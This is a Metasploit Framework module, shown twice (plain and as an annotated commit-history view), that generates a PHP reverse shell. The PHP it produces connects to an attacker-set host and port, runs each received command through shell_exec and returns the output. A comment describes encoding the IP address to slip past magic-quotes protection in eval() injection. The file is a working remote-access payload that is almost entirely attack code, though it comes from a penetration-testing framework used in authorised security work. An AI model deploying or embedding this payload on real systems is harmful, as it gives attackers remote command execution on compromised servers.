metasploit-framework/modules/payloads/singles/php/reverse_php.rb

require 'msf/core'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'

module Msf
module Payloads
module Singles
module Php

module ReversePhp

	include Msf::Payload::Single

	def initialize(info = {})
		super(merge_info(info,
			'Name'          => 'PHP Command Shell, Reverse TCP (via php)',
			'Version'       => '$Revision: 3636 $',
			'Description'   => 'Reverse PHP connect back shell',
			'Author'        => ['diaul <diaul@devilopers.org>',],
			'License'       => BSD_LICENSE,
			'Platform'      => 'php',
			'Arch'          => ARCH_PHP,
			'Handler'       => Msf::Handler::ReverseTcp,
			'Session'       => Msf::Sessions::CommandShell,
			'PayloadType'   => 'cmd',
			'Payload'       =>
				{
					'Offsets' => { },
					'Payload' => ''
				}
			))
	end


	#
	# PHP Reverse Shell
	#
	def php_reverse_shell

	        #
       		# inet_aton to bypass magic quotes protection for eval() vulnerarilities 
        	#

        	if datastore['LHOST']
            		ipaddr = datastore['LHOST'].split(/\./).map{|c| c.to_i}.pack("C*").unpack("N").first
        	end

		shell = <<-END_OF_PHP_CODE
		error_reporting(E_ALL);
		$service_port = #{datastore['LPORT']};

		$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
		$result = socket_connect($socket, #{ipaddr}, $service_port);

		$command = NULL;

		while ($command = socket_read($socket, 2048)) {
        		$output = shell_exec(substr($command, 0, -1));
        		socket_write($socket, $output, strlen($output));
		}

		socket_close($socket);
		END_OF_PHP_CODE
		
		return shell

	end


	#
	# Constructs the payload
	#
	def generate
		return super + php_reverse_shell
	end
	

end

end end end end
new payloads from diaul git-svn-id: file:///home/svn/framework3/trunk@4220 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-18 22:06:19 +00:00			`require 'msf/core'`
			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`

			`module Msf`
			`module Payloads`
			`module Singles`
			`module Php`

			`module ReversePhp`

			`include Msf::Payload::Single`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'PHP Command Shell, Reverse TCP (via php)',`
			`'Version' => '$Revision: 3636 $',`
			`'Description' => 'Reverse PHP connect back shell',`
			`'Author' => ['diaul <diaul@devilopers.org>',],`
			`'License' => BSD_LICENSE,`
			`'Platform' => 'php',`
			`'Arch' => ARCH_PHP,`
			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`

Updates from diaul git-svn-id: file:///home/svn/framework3/trunk@4314 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-04 01:53:43 +00:00


new payloads from diaul git-svn-id: file:///home/svn/framework3/trunk@4220 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-18 22:06:19 +00:00			`#`
			`# PHP Reverse Shell`
			`#`
			`def php_reverse_shell`
Updates from diaul git-svn-id: file:///home/svn/framework3/trunk@4314 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-04 01:53:43 +00:00
			`#`
			`# inet_aton to bypass magic quotes protection for eval() vulnerarilities`
			`#`

			`if datastore['LHOST']`
			`ipaddr = datastore['LHOST'].split(/\./).map{\|c\| c.to_i}.pack("C*").unpack("N").first`
			`end`

new payloads from diaul git-svn-id: file:///home/svn/framework3/trunk@4220 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-18 22:06:19 +00:00			`shell = <<-END_OF_PHP_CODE`
			`error_reporting(E_ALL);`
			`$service_port = #{datastore['LPORT']};`

			`$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);`
Updates from diaul git-svn-id: file:///home/svn/framework3/trunk@4314 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-04 01:53:43 +00:00			`$result = socket_connect($socket, #{ipaddr}, $service_port);`
new payloads from diaul git-svn-id: file:///home/svn/framework3/trunk@4220 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-18 22:06:19 +00:00
Updates from diaul git-svn-id: file:///home/svn/framework3/trunk@4314 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-04 01:53:43 +00:00			`$command = NULL;`
new payloads from diaul git-svn-id: file:///home/svn/framework3/trunk@4220 4d416f70-5f16-0410-b530-b9f4589650da 2006-12-18 22:06:19 +00:00
			`while ($command = socket_read($socket, 2048)) {`
			`$output = shell_exec(substr($command, 0, -1));`
			`socket_write($socket, $output, strlen($output));`
			`}`

			`socket_close($socket);`
			`END_OF_PHP_CODE`

			`return shell`

			`end`


			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + php_reverse_shell`
			`end`


			`end`

			`end end end end`